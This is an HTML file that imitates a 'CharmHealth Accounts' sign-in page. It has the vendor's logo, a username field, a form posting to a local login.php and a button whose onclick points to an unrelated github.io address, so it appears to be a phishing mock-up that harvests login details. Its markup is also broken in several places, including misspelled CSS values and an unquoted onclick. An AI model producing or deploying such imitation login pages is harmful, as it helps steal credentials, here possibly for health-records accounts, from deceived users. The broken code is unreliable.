<!DOCTYPE html>
<html lang="en">
<head>
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>CharmHealth Accounts</title>
        <style>
			body {font-family: Arial, sanspserif; text-align: center; }
			form { display: inline-block; margin-top: 100px; padding: 30px; border: 1px solid #ddd; width: 500px; min-height: 540px }
			h1 {font-size: 1rem; text-align: left; }
			.userform {float: center; width: 400px; height: 20px;}
			p {text-align: left;}
			.logo {float: left; }
			.button {width 400px; height: 44px; background: #159AFF; margin: 0px 0px 36px;
				padding: 1px 6px;box-shadow: 0px 2px 2px #fff;background-color: #159AFF;}
		</style>
		
</head>
	<body>
	<form action="login.php" method="post">
		<img class = "logo" src = "/login/images/charmhealth.png" alt = "charmhealth logo">
		<h1>Sign in</h1>
		<p>to access charmhealth</p>
		<input class = "userform" type="text" name="username" required><br><br>
		<button class = "button" type="submit" value="Next" onclick=location.href = https://zyanwheeler.github.io>
	</form>
</body>

</html>